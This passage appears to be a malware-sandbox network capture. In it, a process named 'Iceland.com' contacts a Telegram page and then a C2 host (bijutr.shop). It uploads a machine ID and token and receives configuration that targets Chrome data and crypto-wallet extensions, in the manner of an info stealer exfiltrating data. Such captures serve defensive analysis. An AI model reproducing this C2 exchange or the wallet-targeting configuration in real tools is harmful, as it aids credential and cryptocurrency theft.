Dec 27, 2024 07:09:17.710517883 CET	1236	IN	Data Raw: 50 56 e8 d7 31 00 00 50 ff 15 60 91 40 00 39 5d d8 0f 8c 14 03 00 00 50 57 e9 08 03 00 00 66 39 1e 0f 84 04 03 00 00 56 e8 b1 31 00 00 50 ff 15 64 91 40 00 e9 f2 02 00 00 66 39 1f 0f 84 f2 eb ff ff 8d 85 54 fc ff ff 50 57 e8 8f 31 00 00 50 ff 15 Data Ascii: PV1P`@9]PWf9V1Pd@f9TPW1Ph@+j=TQPl@u3fPW:1PV1jEfVu.ujV/jh@V/EG5$@Pj@E
Dec 27, 2024 07:09:17.710530043 CET	1236	IN	Data Raw: c8 7c 02 8b c8 50 6a 64 51 ff 15 50 91 40 00 50 8d 45 80 68 c8 9f 40 00 50 ff 15 48 92 40 00 83 c4 0c 8d 45 80 50 ff 75 08 ff 15 38 92 40 00 8d 45 80 50 68 06 04 00 00 ff 75 08 e8 de 29 00 00 33 c0 c9 c2 10 00 56 33 f6 39 74 24 08 74 18 a1 70 c1 Data Ascii: \|PjdQP@PEh@PH@EPu8@EPhu)3V39t$tpB;tP,@5pB^95pBtV]0^@;Gv#VhL2@Vjo5G0@jPpBD@^UVujEPVu5@X@t9uu3@3^]jjt$5@`@
Dec 27, 2024 07:09:17.829504013 CET	1236	IN	Data Raw: 45 f8 3b 45 08 0f 85 86 00 00 00 ff 75 ec 6a 40 ff 15 24 91 40 00 8b f0 a1 0c eb 47 00 83 c0 1c 50 e8 e2 fb ff ff ff 75 ec 56 53 6a ff e8 ed fb ff ff 3b 45 ec 75 5a f6 45 d8 01 89 35 bc ea 47 00 8b 06 a3 08 eb 47 00 74 06 ff 05 04 eb 47 00 6a 08 Data Ascii: E;Euj@$@GPuVSj;EuZE5GGtGjYFD0I;ujSSu`@F<j@VhGX&3_^[jY@V0NV`(VG%u^V8/jV@VhM&^UUMV3+W49Mf;wrft

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49752	149.154.167.99	443	2800	C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:09:40 UTC	85	OUT	GET /k04ael HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
2024-12-27 06:09:41 UTC	512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Dec 2024 06:09:41 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12300 Connection: close Set-Cookie: stel_ssid=b4c5e1ca52fc1b7226_13677589816401163460; expires=Sat, 28 Dec 2024 06:09:41 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2024-12-27 06:09:41 UTC	12300	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 30 34 61 65 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @k04ael</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49758	188.245.216.205	443	2800	C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:09:44 UTC	231	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: bijutr.shop Connection: Keep-Alive Cache-Control: no-cache
2024-12-27 06:09:45 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 06:09:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-27 06:09:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49766	188.245.216.205	443	2800	C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:09:46 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DJ5FK6FU3EKNYMOPHD2D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: bijutr.shop Content-Length: 255 Connection: Keep-Alive Cache-Control: no-cache
2024-12-27 06:09:46 UTC	255	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 4a 35 46 4b 36 46 55 33 45 4b 4e 59 4d 4f 50 48 44 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 45 41 41 38 35 36 46 46 33 37 34 35 32 35 33 37 30 33 36 34 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 44 4a 35 46 4b 36 46 55 33 45 4b 4e 59 4d 4f 50 48 44 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 44 4a 35 46 4b 36 46 55 33 45 4b 4e 59 4d 4f 50 48 44 32 44 2d 2d 0d 0a Data Ascii: ------DJ5FK6FU3EKNYMOPHD2DContent-Disposition: form-data; name="hwid"1EAA856FF374525370364-a33c7340-61ca------DJ5FK6FU3EKNYMOPHD2DContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------DJ5FK6FU3EKNYMOPHD2D--
2024-12-27 06:09:47 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 06:09:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-27 06:09:47 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 35 34 30 64 65 61 35 35 61 37 38 34 31 62 37 62 32 61 63 64 62 66 38 65 61 66 31 38 31 39 62 37 7c 31 7c 30 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|540dea55a7841b7b2acdbf8eaf1819b7\|1\|0\|1\|1\|0\|50000\|00

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49771	188.245.216.205	443	2800	C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:09:48 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DJEKNYUK6F3E3EKX4OP8 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: bijutr.shop Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-27 06:09:48 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 4a 45 4b 4e 59 55 4b 36 46 33 45 33 45 4b 58 34 4f 50 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 34 30 64 65 61 35 35 61 37 38 34 31 62 37 62 32 61 63 64 62 66 38 65 61 66 31 38 31 39 62 37 0d 0a 2d 2d 2d 2d 2d 2d 44 4a 45 4b 4e 59 55 4b 36 46 33 45 33 45 4b 58 34 4f 50 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 44 4a 45 4b 4e 59 55 4b 36 46 33 45 33 45 4b 58 34 4f 50 38 0d 0a 43 6f 6e 74 Data Ascii: ------DJEKNYUK6F3E3EKX4OP8Content-Disposition: form-data; name="token"540dea55a7841b7b2acdbf8eaf1819b7------DJEKNYUK6F3E3EKX4OP8Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------DJEKNYUK6F3E3EKX4OP8Cont
2024-12-27 06:09:49 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 06:09:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-27 06:09:49 UTC	2192	IN	Data Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49777	188.245.216.205	443	2800	C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:09:51 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----OZUKFK6PZ58YM7QQ1V3O User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: bijutr.shop Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-27 06:09:51 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 5a 55 4b 46 4b 36 50 5a 35 38 59 4d 37 51 51 31 56 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 34 30 64 65 61 35 35 61 37 38 34 31 62 37 62 32 61 63 64 62 66 38 65 61 66 31 38 31 39 62 37 0d 0a 2d 2d 2d 2d 2d 2d 4f 5a 55 4b 46 4b 36 50 5a 35 38 59 4d 37 51 51 31 56 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 4f 5a 55 4b 46 4b 36 50 5a 35 38 59 4d 37 51 51 31 56 33 4f 0d 0a 43 6f 6e 74 Data Ascii: ------OZUKFK6PZ58YM7QQ1V3OContent-Disposition: form-data; name="token"540dea55a7841b7b2acdbf8eaf1819b7------OZUKFK6PZ58YM7QQ1V3OContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------OZUKFK6PZ58YM7QQ1V3OCont
2024-12-27 06:09:52 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 06:09:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-27 06:09:52 UTC	5837	IN	Data Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49783	188.245.216.205	443	2800	C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:09:53 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----K6PZCBASJEKFU3ECBA1N User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: bijutr.shop Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-12-27 06:09:53 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 36 50 5a 43 42 41 53 4a 45 4b 46 55 33 45 43 42 41 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 34 30 64 65 61 35 35 61 37 38 34 31 62 37 62 32 61 63 64 62 66 38 65 61 66 31 38 31 39 62 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 36 50 5a 43 42 41 53 4a 45 4b 46 55 33 45 43 42 41 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 36 50 5a 43 42 41 53 4a 45 4b 46 55 33 45 43 42 41 31 4e 0d 0a 43 6f 6e 74 Data Ascii: ------K6PZCBASJEKFU3ECBA1NContent-Disposition: form-data; name="token"540dea55a7841b7b2acdbf8eaf1819b7------K6PZCBASJEKFU3ECBA1NContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------K6PZCBASJEKFU3ECBA1NCont
2024-12-27 06:09:54 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 06:09:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-27 06:09:54 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49789	188.245.216.205	443	2800	C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:09:56 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----OPHDT2D26F37YM7GV3E3 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: bijutr.shop Content-Length: 7165 Connection: Keep-Alive Cache-Control: no-cache
2024-12-27 06:09:56 UTC	7165	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 50 48 44 54 32 44 32 36 46 33 37 59 4d 37 47 56 33 45 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 34 30 64 65 61 35 35 61 37 38 34 31 62 37 62 32 61 63 64 62 66 38 65 61 66 31 38 31 39 62 37 0d 0a 2d 2d 2d 2d 2d 2d 4f 50 48 44 54 32 44 32 36 46 33 37 59 4d 37 47 56 33 45 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 4f 50 48 44 54 32 44 32 36 46 33 37 59 4d 37 47 56 33 45 33 0d 0a 43 6f 6e 74 Data Ascii: ------OPHDT2D26F37YM7GV3E3Content-Disposition: form-data; name="token"540dea55a7841b7b2acdbf8eaf1819b7------OPHDT2D26F37YM7GV3E3Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------OPHDT2D26F37YM7GV3E3Cont
2024-12-27 06:09:57 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 06:09:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-27 06:09:57 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49791	188.245.216.205	443	2800	C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:09:57 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----OPHDT2D26F37YM7GV3E3 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: bijutr.shop Content-Length: 489 Connection: Keep-Alive Cache-Control: no-cache
2024-12-27 06:09:57 UTC	489	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 50 48 44 54 32 44 32 36 46 33 37 59 4d 37 47 56 33 45 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 34 30 64 65 61 35 35 61 37 38 34 31 62 37 62 32 61 63 64 62 66 38 65 61 66 31 38 31 39 62 37 0d 0a 2d 2d 2d 2d 2d 2d 4f 50 48 44 54 32 44 32 36 46 33 37 59 4d 37 47 56 33 45 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 4f 50 48 44 54 32 44 32 36 46 33 37 59 4d 37 47 56 33 45 33 0d 0a 43 6f 6e 74 Data Ascii: ------OPHDT2D26F37YM7GV3E3Content-Disposition: form-data; name="token"540dea55a7841b7b2acdbf8eaf1819b7------OPHDT2D26F37YM7GV3E3Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------OPHDT2D26F37YM7GV3E3Cont
2024-12-27 06:09:58 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 06:09:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-27 06:09:58 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49800	172.217.21.36	443	3732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:00 UTC	615	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-27 06:10:01 UTC	1266	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 06:10:01 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-pzCZ6pxaSlx3hjGV7EwRqA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-27 06:10:01 UTC	124	IN	Data Raw: 33 34 62 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 71 75 61 6e 74 75 6d 20 63 6f 6d 70 75 74 69 6e 67 20 73 74 6f 63 6b 73 22 2c 22 63 75 6c 70 61 20 74 75 79 61 20 6d 6f 76 69 65 20 72 65 6c 65 61 73 65 20 64 61 74 65 22 2c 22 63 68 61 72 67 65 72 73 20 76 73 20 6e 65 77 20 65 6e 67 6c 61 6e 64 20 70 61 74 72 69 6f 74 73 22 2c 22 74 69 6b 74 6f 6b 20 62 61 6e 6e 65 64 22 Data Ascii: 34b)]}'["",["quantum computing stocks","culpa tuya movie release date","chargers vs new england patriots","tiktok banned"
2024-12-27 06:10:01 UTC	726	IN	Data Raw: 2c 22 77 69 6e 74 65 72 20 73 74 6f 72 6d 20 77 61 72 6e 69 6e 67 22 2c 22 6e 69 6e 74 65 6e 64 6f 20 73 77 69 74 63 68 20 32 20 63 6f 6e 73 6f 6c 65 22 2c 22 6a 75 6a 75 74 73 75 20 69 6e 66 69 6e 69 74 65 20 69 6e 6e 61 74 65 20 74 65 63 68 6e 69 71 75 65 73 22 2c 22 77 65 6c 6c 73 20 66 61 72 67 6f 20 62 61 6e 6b 20 73 65 74 74 6c 65 6d 65 6e 74 20 65 6c 69 67 69 62 69 6c 69 74 79 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 Data Ascii: ,"winter storm warning","nintendo switch 2 console","jujutsu infinite innate techniques","wells fargo bank settlement eligibility"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2
2024-12-27 06:10:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49806	172.217.21.36	443	3732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
